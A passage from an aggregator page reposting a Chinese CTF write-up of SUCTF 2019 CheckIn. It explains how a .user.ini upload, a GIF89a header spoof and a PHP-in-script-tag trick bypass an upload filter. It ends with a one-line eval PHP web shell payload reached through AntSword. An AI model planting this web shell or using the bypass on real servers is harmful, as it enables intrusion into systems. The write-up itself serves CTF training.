码农知识堂 - 1000bd
  •   Python
  •   PHP
  •   JS/TS
  •   JAVA
  •   C/C++
  •   C#
  •   GO
  •   Kotlin
  •   Swift
  • 练[SUCTF 2019]CheckIn


    [SUCTF 2019]CheckIn

    文章目录

        • [SUCTF 2019]CheckIn
        • 掌握知识
        • 解题思路
        • 关键paylaod

    在这里插入图片描述

    掌握知识

    ​ .user.ini文件上传利用–需要上传目录有一个php文件(index.php),文件头绕过,文件内容<?检测

    解题思路

    1. 打开题目链接,发现又是一个上传文件题目,继续上传改后缀的一句话木马,然后抓包,修改php后缀发现返回非法后缀名,尝试phtml.php3.php6...都没成功,看来是白名单了。

    image-20231003161925703

    1. 只好尝试上传一下jpg文件查看一下其他过滤和上传目录,发现还存在文件头检测和对文件内容的检测。文件头添加GIF89a?即可绕过,的检测可以继续使用js代码执行php代码的方式

    image-20231003162115358

    image-20231003162107404

    1. 上传正常格式的jpg文件后,发现回显了上传目录和目录结构发现了index.php文件。那看来是使用.user.ini文件了,该文件能够实现文件包含内容,前提就是上传的目录下有一个php文件,这样使用.user.ini包含的文件就可以执行文件内的php代码了

    image-20231003162208536

    1. 利用方法已经明白,接着就上传.user.ini和shell.jpg文件即可,绕过文件头和文件内容即可成功上传

    image-20231003162351494

    image-20231003162456296

    1. 现在目录下存在.user,ini配置文件,index.php的php文件,和含有恶意代码的jpg文件,只需要访问该php文件即可自动包含jpg文件执行其中的恶意代码,所以蚁剑连接的地址也是该php文件。直接蚁剑连接,在根目录下拿下flag

    image-20231003162717873

    image-20231003162723164

    image-20231003162728296

    关键paylaod

    <script language="php">eval($_POST['a']);</script>
    
    GIF89a?
    
    • 1
    • 2
    • 3
  • 相关阅读:
    类和对象——上
    vite打包失败 - out of memory
    【Python】AppUI自动化—appium自动化元素定位、元素事件操作(17)下
    C# , .netWebApi 实现类似Java 的Ioc 自动装配@Autowired
    Uniapp真机调试没有检测到设备,请插入设备或启动模拟器后刷新再试
    云计算 - 对象存储服务OSS技术全解
    全场景数实融合聚焦北京——2023(第六届)行业信息技术应用创新大会隆重召开
    Dapr 与 NestJs ,实战编写一个 Pub & Sub 装饰器
    python逆向还原dnspy反编译的C#算法
    中值滤波算法及例程
  • 原文地址:https://blog.csdn.net/m0_66225311/article/details/133690775
  • 最新文章
  • 攻防演习之三天拿下官网站群
    数据安全治理学习——前期安全规划和安全管理体系建设
    企业安全 | 企业内一次钓鱼演练准备过程
    内网渗透测试 | Kerberos协议及其部分攻击手法
    0day的产生 | 不懂代码的"代码审计"
    安装scrcpy-client模块av模块异常,环境问题解决方案
    leetcode hot100【LeetCode 279. 完全平方数】java实现
    OpenWrt下安装Mosquitto
    AnatoMask论文汇总
    【AI日记】24.11.01 LangChain、openai api和github copilot
  • 热门文章
  • 十款代码表白小特效 一个比一个浪漫 赶紧收藏起来吧!!!
    奉劝各位学弟学妹们,该打造你的技术影响力了!
    五年了,我在 CSDN 的两个一百万。
    Java俄罗斯方块,老程序员花了一个周末,连接中学年代!
    面试官都震惊,你这网络基础可以啊!
    你真的会用百度吗?我不信 — 那些不为人知的搜索引擎语法
    心情不好的时候,用 Python 画棵樱花树送给自己吧
    通宵一晚做出来的一款类似CS的第一人称射击游戏Demo!原来做游戏也不是很难,连憨憨学妹都学会了!
    13 万字 C 语言从入门到精通保姆级教程2021 年版
    10行代码集2000张美女图,Python爬虫120例,再上征途
Copyright © 2022 侵权请联系2656653265@qq.com    京ICP备2022015340号-1
正则表达式工具 cron表达式工具 密码生成工具

京公网安备 11010502049817号